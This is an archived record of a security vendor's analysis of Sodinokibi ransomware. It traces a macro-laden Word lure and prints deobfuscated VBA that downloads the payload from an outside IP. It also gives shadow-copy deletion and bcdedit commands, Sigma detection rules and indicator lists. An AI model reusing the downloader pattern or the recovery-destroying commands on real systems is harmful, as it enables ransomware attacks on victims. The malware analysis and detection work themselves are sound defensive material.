{
	"id": "344dfb8f-0471-4cca-99c9-1aec3cdd3191",
	"created_at": "2026-04-06T00:06:25.889593Z",
	"updated_at": "2026-04-10T03:21:36.090106Z",
	"deleted_at": null,
	"sha1_hash": "dd6d51dfe5789131e197f87173f972fd4915401a",
	"title": "A brief history and further technical analysis of Sodinokibi Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1404251,
	"plain_text": "A brief history and further technical analysis of Sodinokibi\r\nRansomware\r\nBy Suleyman Ozarslan, PhD\r\nPublished: 2020-01-14 · Archived: 2026-04-02 10:48:45 UTC\r\nSodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile\r\nattacks since April 2019:\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 1 of 16\n\nPicus is designed to simulate adversarial Tactics, Techniques and Procedures (TTPs) in endpoints by mimicking\r\nmalware activities without adversely affecting endpoint systems. In this way, emergent and prevalent APT and\r\nmalware threats are reverse-engineered and malware actions are analyzed to build endpoint threat scenarios. Each\r\naction as an attack technique is mapped to MITRE’s ATT\u0026CK (Adversarial Tactics, Techniques, and Common\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 2 of 16\n\nKnowledge) framework. The remaining part of this article analysis of a Sodinokibi sample with referring to\r\nATT\u0026CK tactics and techniques.\r\nInitial Access\r\nSpearphishing Attachment (ATT\u0026CK T1193) is one of the most used Initial Access techniques used by\r\nransomware families as in Sodinokibi. Attackers use spam emails with an attached MS Office Word document\r\nincluding a malicious macro to download the ransomware to the target system. In order to show the lifecycle of\r\nSodinokibi ransomware, we analyzed a Microsoft Word document. The specific sample analyzed below is\r\nBewerbungsunterlagen_6704760.doc ( SHA-256:\r\nfb8b03748b617acf0ee3b138c5b37e74ec396bc73da3362d633862d7283742fd , detection rate is only 33/60 as of\r\ntoday). Even though Sodinokibi uses simple obfuscation techniques mentioned below, 30 of 60 antiviruses cannot\r\ndetect it. “Bewerbungsunterlagen” means “application document” in German, and the attackers used a CV theme\r\nto lure victims into downloading the document. Sodinokibi is a “Ransomware-as-a-Service (RAAS) malware, so\r\nits distribution methods vary depending on the attacker distributing it. Attackers have used the following Initial\r\nAccess techniques in their other campaigns to deliver Sodinokibi:\r\nExploit Public-Facing Application (ATT\u0026CK T1190) : Attackers exploit vulnerabilities in enterprise\r\napplications to distribute it, such as the deserialization vulnerability CVE-2019-2725 in Oracle WebLogic\r\nServer having a CVSS score of 9.8/10.\r\nRemote Desktop Protocol ( ATT\u0026CK T1076) : Attackers use RDP to deliver Sodinokibi. This delivery\r\ntechnique can also be classified in External Remote Services ( ATT\u0026CK T1133).\r\nSupply Chain Compromise ( ATT\u0026CK T1195) : Sodinokibi ransomware was distributed through a\r\ncompromised version of WinRAR downloaded from the WinRAR Italia website.\r\nDrive-by-Compromise ( ATT\u0026CK T1189): Attackers compromised WordPress sites and injected\r\nJavaScript over the content of the original site to spread Sodinokibi.\r\nWhen a victim opens the document, Microsoft Word asks to enable/disable macros. It reveals that a macro is\r\nembedded in the document (Scripting, ATT\u0026CK T1054).\r\nThe malicious document claims that it was created in an earlier version of Microsoft Office and asks the victim to\r\nenable the content, which launches the code hidden in the macros.\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 3 of 16\n\nDefense Evasion\r\nWhen we examined macros in the document, we saw that VBA (Visual Basic for Applications) codes were split\r\ninto modules and functions for the purpose of obfuscation (Obfuscated Files or Information, ATT\u0026CK T1027).\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 4 of 16\n\nFunction fP1()\r\n v1 = 465\r\n Select Case v1\r\n Case 1 To 5\r\n fP1 = \"hello\"\r\n Case 6, 7, 8\r\n fP1 = \"hello2\"\r\n Case 9 To 10\r\n fP1 = \"hello3\"\r\n Case Else\r\n fP1 = \"C:\\\\Windows\" \u0026 fP2 \u0026 fP3\r\n End Select\r\n End Function\r\n \r\n Function fP2()\r\n fP2 = \"\\\\Te\"\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 5 of 16\n\nEnd Function\r\n \r\n Function fP3()\r\n fP3 = \"mp\\\\MicrosoftOfficeWord_upd.v.88735.34.5\" + \".\" + \"exe\"\r\n End Function\r\n \r\n“We combined the above functions and revealed that fP1 =\r\n\"C:\\\\Windows\\\\Temp\\\\MicrosoftOfficeWord_upd.v.88735.34.5.exe”.\r\n Function fP1()\r\n v1 = 345\r\n Select Case v1\r\n Case 1 To 5\r\n fP1 = \"hello\"\r\n Case 6, 7, 8\r\n fP1 = \"hello2\"\r\n Case 9 To 10\r\n fP1 = \"hello3\"\r\n Case Else\r\n fU1 = fU2(Array(10, 20, 30))\r\n End Select\r\n End Function\r\n \r\n Function fU2(v1)\r\n If IsArray(v1) = True Then\r\n fU2 = \"hxxp://54.39.233.132/de1.trp\"\r\n Else\r\n fU2 = \"hello\"\r\n End If\r\n End Function\r\n \r\nAccording to the above functions, fU1 = \"hxxp://54.39.233.132/de1.trp\".\r\nAs we know the fU1 and fP1 parameters, we can understand the following function:\r\n Function fD2(v1 As Integer, v2 As Integer)\r\n If v1 = v2 Then\r\n fD2 = URLDownloadToFile(0, fU1, fP1, 0, 0)\r\n Else\r\n fD2 = 123\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 6 of 16\n\nEnd If\r\n End Function\r\n \r\nThe URLDownloadToFile function downloads bits from the Internet and saves them to a file. Let’s put the values\r\nwe obtained into this function:\r\nURLDownloadToFile(0, hxxp://54.39.233.132/de1.trp,\r\nC:\\\\Windows\\\\Temp\\\\MicrosoftOfficeWord_upd.v.88735.34.5.exe, 0, 0)\r\nThe second parameter (fU1) is a string value that contains the URL to download, and the third parameter (fP1) is a\r\nstring value containing the name or full path of the file to create for the download. Accordingly, this function\r\ndownloads de1.trp from 54.39.233.132 and saves it to the C:\\Windows\\Temp\\ directory as\r\nMicrosoftOfficeWord_upd.v.88735.34.5.exe.\r\nThe downloaded file is the Sodinokibi ransomware (SHA-256:\r\n720fbe60f049848f02ba9b2b91926f80ba65b84f0d831a55f4e634c820bd0848, detection rate is 51/69 as of today).\r\nIts artifacts usually mimic the names of known executables for Defense Evasion, such as a Microsoft Word update\r\nfile name (MicrosoftOfficeWord_upd.v.88735.34.5.exe) as in this sample (Masquerading, ATT\u0026CK T1036).\r\nExecution\r\nAs seen in the above process graph, the macro in the Word document downloads and runs Sodinokibi executable.\r\nAfter execution, it runs the following command using cmd.exe (Command-Line Interface, ATT\u0026CK T1059):\r\n C:\\Windows\\System32\\cmd.exe\" /c vssadmin.exe Delete Shadows /All /Quiet \u0026 bcdedit /set\r\n \r\nAt first, this command runs vssadmin.exe to delete all volume shadow copies on the system to prevent\r\nrecovery (Inhibit System Recovery, ATT\u0026CK T1490)\r\n vssadmin.exe Delete Shadows /All /Quiet\r\n \r\nThen, it uses bcdedit.exe twice to disable automatic Windows recovery features by modifying boot\r\nconfiguration data (Inhibit System Recovery, ATT\u0026CK T1490)\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 7 of 16\n\nbcdedit /set {default} recoveryenabled No\r\n \r\n bcdedit /set {default} bootstatuspolicy ignoreallfailures\r\n \r\nSigma rules detecting the above actions are given in the Appendix.\r\nImpact\r\nLike most ransomware, Sodinokibi encrypts files and adds a random extension such as “test.jpg.1cd8t9ahd5”\r\n(Data Encrypted for Impact, ATT\u0026CK T1486). It also drops a ransom note in folders that contain encrypted files.\r\nThe name of the ransom note is the random extension added to the encrypted files. For example, if the extension is\r\n\".1cd8t9ahd5\", the ransom message filename will be called \"1cd8t9ahd5-HOW-TO-DECRYPT.txt\".\r\nThe ransom note recommends accessing the attacker’s website over the TOR browser:\r\nhxxp://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C2D97495C4BA3647\r\nWhen we accessed the website, we saw the following page that wants 0,6346 Bitcoin worth $5,000. If you pay the\r\nransom in two days, the cost is halving.\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 8 of 16\n\nIn the “ABOUT US” section on their website, they claim that they developed the best data encryption and\r\ndecryption system available today. I am sure they did not develop the best encryption method, but they use\r\nmultiple encryption by encrypting files and also the private keys. To put it another way, it requires two keys for\r\ndecryption. Sodinokibi uses AES encryption to encrypt the private keys, and Salsa20 for encrypting files. As far as\r\nI know, unfortunately there are no decryption tools to restore data encrypted by Sodinokibi ransomware.\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 9 of 16\n\nCONCLUSION\r\nIn this wave of attacks, Sodinokibi ransomware spreads by spearphishing emails that lure victims into\r\ndownloading a CV themed Word document, which contains a macro that downloads and executes the ransomware.\r\nCommands in the macro are split into different modules and functions for defense evasion. After infection,\r\nSodinokibi encrypts files and puts a ransom note in folders that contain encrypted files. It also deletes all volume\r\nshadow copies and disables automatic Windows recovery features to inhibit system recovery. Sodinokibi uses very\r\nsimilar infection and execution techniques with the notorious GandCrab ransomware, raising suspicion that it was\r\ndeveloped by GandCrab authors.\r\nDo you want to know if your current enterprise security controls are blocking these types of attacks? You can\r\nrequest a demo. Don’t hesitate. Let us show you how within just a few hours, we can quickly report to you how\r\nyour network security systems are protecting you against Sodinokibi and other prominent cyber attacks!\r\nAPPENDIX\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nInitial Access Execution Persistence\r\nDefense\r\nEvasion\r\nLateral\r\nMovement\r\nImpact\r\nT1189 Drive-by-Compromise\r\nT1059\r\nCommand-Line Interface\r\nT1133\r\nExternal\r\nRemote\r\nServices\r\nT1036\r\nMasquerading\r\nT1076\r\nRemote\r\nDesktop\r\nProtocol\r\nT1486 Data\r\nEncrypted for\r\nImpact\r\nT1190 Exploit\r\nPublic-Facing\r\nApplication\r\nT1054\r\nScripting\r\n \r\nT1054\r\nScripting\r\n \r\nT1490 Inhibit\r\nSystem\r\nRecovery\r\nT1133 External\r\nRemote Services\r\n         \r\nT1193\r\nSpearphishing\r\nAttachment\r\n         \r\nT1195 Supply\r\nChain\r\nCompromise\r\n         \r\nSigma Rules\r\nInhibit System Recovery by Shadow Copy Deletion via Vssadmin Utility\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 10 of 16\n\ntitle: Inhibit System Recovery by Shadow Copy Deletion via Vssadmin Utility\r\n status: experimental\r\n description: Detects the attempt to delete shadow copy via Vssadmin Utility. This techn\r\n author: Picus Security\r\n references:\r\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/vss\r\n - https://attack.mitre.org/techniques/T1490/\r\n - https://attack.mitre.org/tactics/TA0040/\r\n \r\n \r\n logsource:\r\n product: windows\r\n service: security\r\n definition1: 'Requirements: Group Policy : Computer Configuration\\Windows Settings\\S\r\n definition2: 'Requirements: Group Policy : Computer Configuration\\ Administrative Te\r\n \r\n \r\n detection:\r\n selection:\r\n EventID: 4688\r\n NewProcessName: '*\\vssadmin.exe'\r\n ProcessCommandLine: '*delete shadows*'\r\n condition: selection\r\n \r\n falsepositives:\r\n - Legitimate administrative activities\r\n \r\n level: medium\r\n tags:\r\n - attack.impact\r\n - attack.t1490\r\n - attack.ta0040\r\n \r\n \r\n \r\nInhibit System Recovery by Disabling Windows Recovery Features via Bcdedit Tool\r\n title: Inhibit System Recovery by Disabling Windows Recovery Features via Bcdedit Tool\r\n status: experimental\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 11 of 16\n\ndescription: Detects the attempt to disable Windows recovery features via bcdedit tool\r\n author: Picus Security\r\n references:\r\n \r\n - https://attack.mitre.org/techniques/T1490/\r\n - https://attack.mitre.org/tactics/TA0040/\r\n \r\n logsource:\r\n \r\n product: windows\r\n service: security\r\n definition1: 'Requirements: Group Policy : Computer Configuration\\Windows Settings\\\r\n definition2: 'Requirements: Group Policy : Computer Configuration\\ Administrative T\r\n \r\n detection:\r\n \r\n selection:\r\n EventID: 4688\r\n NewProcessName: '*\\bcdedit.exe'\r\n ProcessCommandLine: '*recoveryenabled no*'\r\n condition: selection\r\n \r\n \r\n falsepositives:\r\n - Legitimate administrative activities\r\n level: medium\r\n tags:\r\n \r\n - attack.impact\r\n - attack.t1490\r\n - attack.ta0040\r\n \r\n \r\nIndicator of Compromises (IoC)\r\nDelivery Documents (12)\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 12 of 16\n\n08E7D0E983D0220D2A8461B92A47B7F124FB1A908E96AC764DE5C17CF4752860\r\n 1556A1F0240524777400D348FEF71C6CB08E6AEFCCD5E941CD7A0BBF18C0154F\r\n 34A90353EB2A9DDE073ACC7C7AFDFDA485751796263D42A3AD7826F3D2F16760\r\n 3C110B159BED84231DCE840F02698F5E0EB894B1EC5E56C2AB85EDFAFAFDA0C8\r\n 788E59B2FB3C80323B55CC94DC61C9D61A2D490874014591D0A8D36958B3E2F6\r\n 7A4D05FCCC674B3E957F19E288D5149AC326C7197BDB4CCAC8055E81462A85E9\r\n C1A4878CBD32046E2FD73BBD910C62354C22BA5E53F10451420FD2F7E778A90C\r\n CB77DC3AE2CEE170F3BD49148BF71080688E8CA3096AF1A07CC26677FB246404\r\n D4E2FBCC71F4D02D01747BDAC5806DC56E59CAE4409E47867F3365FF998E8803\r\n DEEC8382BC1A851A74B7261D7971EC65436AE43F51260948FAFCC794594EF77B\r\n E8C1360A9B36EF1E4F93FC17D95963A47EC87AD3C3D85A5E0A16C29D00D53CD9\r\n FB8B03748B617ACF0EE3B138C5B37E74EC396BC73DA3362D633862D7283742FD\r\n \r\nSodinokibi Executables (55)\r\n 06B323E0B626DC4F051596A39F52C46B35F88EA6F85A56DE0FD76EC73C7F3851\r\n 0C71AD6BF359A83BD638A94403CE010B27DD7562EB8DA359A4316847E41C530E\r\n 0DAB0428B414B0440288A12FBC20DAB72339EF72FF5859E8C18D76DD8B169F50\r\n 139A7D6656FEEBE539B2CB94B0729602F6218F54FB5B7531B58CFE040F180548\r\n 1529519A30988F43B2A6ECE10F4115AB7EC282F25D3255F2A99A890E1C1C08DB\r\n 1A2A7BB050304E33C3303990C456779DF8500730F3821D2842FCFDF5B39981D4\r\n 1D8D0EE5E83DA80F119E53527577A2B70D8A65282B3F9D011F178E34D3582823\r\n 1E22338DFB7BE3F01E2ACB28984039EF6381FC67AB8771E2EEF254687F3D0B96\r\n 26C499E3F9EC79AE91FCA43DD81F9D1302A913EE30474223F3F5320C10C4A4A0\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 13 of 16\n\n2CDE04820DE1C7CC080B36DB54B4F48E00629326716EB4678AAB2C8EAAAC8280\r\n 338E8F24EEB38B5EF67EF662B65D592C816EBA94DFAAAC856021DAC407DAF294\r\n 34DFFDB04CA07B014CDAEE857690F86E490050335291CCC84C94994FA91E0160\r\n 3B5DD6038D9CB2DFD7D5089B629B1A3EFBC4A79EBDD1DC773B9790917E40849F\r\n 3EB7FDAACCFCD2C71F527C87B55FFC40BCA2ED82728593DBD44AE31B0B389C14\r\n 412E951A350B84F8C0D0A2DB79029B4BBD6BE624656F2A739DB0FC00C6DBB52F\r\n 43AEF9C8395CB4BEBAED211E1A364CDF3074B80FF0A3150CD941A07977024B03\r\n 48CE9CC7A0539232C3B5C0E6D44206F145B530A108792F51143B9A3FCED446AC\r\n 510EB5EBDF01D199742A98E50DD00637C6B9AF6A22DB23635BD63D4B2BF9885E\r\n 53178B6CF05DE5165B5B15C88426215B502DCC4C681E8C049E37E3BB503CBEC9\r\n 5DDE3386E0CE769BFD1880175168A71931D1FFB881B5050760C19F46A318EFC9\r\n 5DEB8DB611178E0858435460FC7CFF9E3F2CA23766CD5F023155C1EB6CF3E58E\r\n 60F1FC7E684C71E0203D7E6EA7FCB691B5CD723A7DA6EF4E4E462AE7F262E857\r\n 6329693E5C61A2F0FA1A53BD177F5A332EF729050B3F109630B759C792F0B986\r\n 6A2BD52A5D68A7250D1DE481DCCE91A32F54824C1C540F0A040D05F757220CD3\r\n 720FBE60F049848F02BA9B2B91926F80BA65B84F0D831A55F4E634C820BD0848\r\n 721A6E2F7EA7C72CD76FD00DCCE09BA9038C2629FEE19A9EB8B493D2419B0CE6\r\n 7227CB2316B9E3B678698609B41BA67958D509FBF37C46CBDE714B105B71BD68\r\n 7BE57F5067BB6DA0EF6804A49C8F4BA951E3E668E4B9C51AD492DF16C925A1B7\r\n 7E105447D0805615ED84971CEB96B2177C050AF2A7B4E396909109D9B6A4B9F3\r\n 893FE5EFAFE1F89C93802840D71FFDA98D8F586220537CB03FA81B9F6D6044E0\r\n 8C7E451F9D41AB36361AD516AF1AFC7ED985B7595FA77B6606775CB4686F9D1F\r\n 98FC76F4920BEF67830BE2D7D9C45FCFF4CA47C9003573708C5B1EDFE5A1B705\r\n A1C58EE02858564BDBB8496EF4F9CEBAED39CF517F1C05240C79341DBD07AD95\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 14 of 16\n\nA376246E76EDB3F78FB5AFC32B7C250EB93AC658C75A14356644644D4FC93BAF\r\n A46B363018C0D60F3DAFE2D23341FA9D72D989CE4C35D2EC1198F98805D41B8A\r\n A593E2CC6FE811D6BDA7750806FDF4692624E4545AA6451036769455AA9C02CE\r\n A89E86FF5118A51337AD90686C9B5C1B986DD2BED51BBD22334D8A9D1DD89582\r\n A9BBF8012630DC6BCD8ABAC51E45FF9EA185F4EF5FEA037A63CF36F1CCED7281\r\n AB9755A71005534C3D54354BE77F304D7CB931B65A9DE9A3B0F5FF85F1118F95\r\n ADEF0855D17DD8DDDCB6C4446E58AA9F5508A0453F53DD3FEFF8D034D692616F\r\n B2FF63F76AAEB73B02777C3B79022BA5A0DB2D44F61071AF808C4074E88ED6F7\r\n BD034A6A4481AC8902E20F98350D47D06A035C57E5EA8A21D34BFE017EDB13DA\r\n BF7114F025FFF7DBC6B7AFF8E4EDB0DD8A7B53C3766429A3C5F10142609968F9\r\n C9FBE5FA6363031BD15DEE006151DDF7D9921C415421479FEC2E9732E451B584\r\n D5F7964DC07BB3465FBC3A995FCADD623197716480F6B86518A5DFDAFC9F3AF7\r\n D66F94A9FEAA7AB3C06C6AFB7E2C00806607B17C77C068539E7C5F11A0447B00\r\n D74CD044351030290F6AD8F70F91D51B6C39675CA3C70C45B5B0C5BD09589FF6\r\n DDB62308575FC302245EF34D7C67EE95EEFB8A834201475DCDF490E24AA6A444\r\n E4E83D2787545C363C909247592FA5513F6A9F330C13586A14B99D6B7BB60A99\r\n E776DE801B898C65CBEF480CCEC47A60C1436E4BA1EA11F99EF2B90AB05961FF\r\n E7F9C0229C0874C069C2F3DCF237E1EE334AC4F9BC955BE8146D07941FF35790\r\n F582A3E83181096236A5D63445CED2EA2F6F61BB9B4DDF82762DD2AE11C233A5\r\n F80527B6AD651D82B59B018C2960AB4AF31891AAB4315F325920C010CCB38F7F\r\n FB1358F4F00223FD5AA87BED22B29A65DCF7C1C26921750329EF67CBD1222B08\r\n FBA829759D359DEA91DB09AC8B4674237D8DBC57EC8B76A3EBF227DA9AE96535\r\n \r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 15 of 16\n\nDomains (4)\r\n Anmcousa.xyz\r\n Blaerck.xyz\r\n cklinosleeve.icu\r\n fcamylleibrahim.top\r\n \r\nIPs (4)\r\n 45.67.14.162\r\n 54.39.233.132\r\n 185.193.141.248\r\n 185.234.218.9\r\n \r\nSource: https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 16 of 16\n\n https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware     \nDefense Evasion      \nWhen we examined macros in the document, we saw that VBA (Visual Basic for Applications) codes were split\ninto modules and functions for the purpose of obfuscation (Obfuscated Files or Information, ATT\u0026CK T1027).\n   Page 4 of 16   \n\nFunction fD2(v1 If v1 = v2 As Integer, Then v2 As Integer) \nfD2 = URLDownloadToFile(0, fU1, fP1, 0, 0)\nElse  \nfD2 = 123  \n Page 6 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware"
	],
	"report_names": [
		"a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775433985,
	"ts_updated_at": 1775791296,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dd6d51dfe5789131e197f87173f972fd4915401a.pdf",
		"text": "https://archive.orkl.eu/dd6d51dfe5789131e197f87173f972fd4915401a.txt",
		"img": "https://archive.orkl.eu/dd6d51dfe5789131e197f87173f972fd4915401a.jpg"
	}
}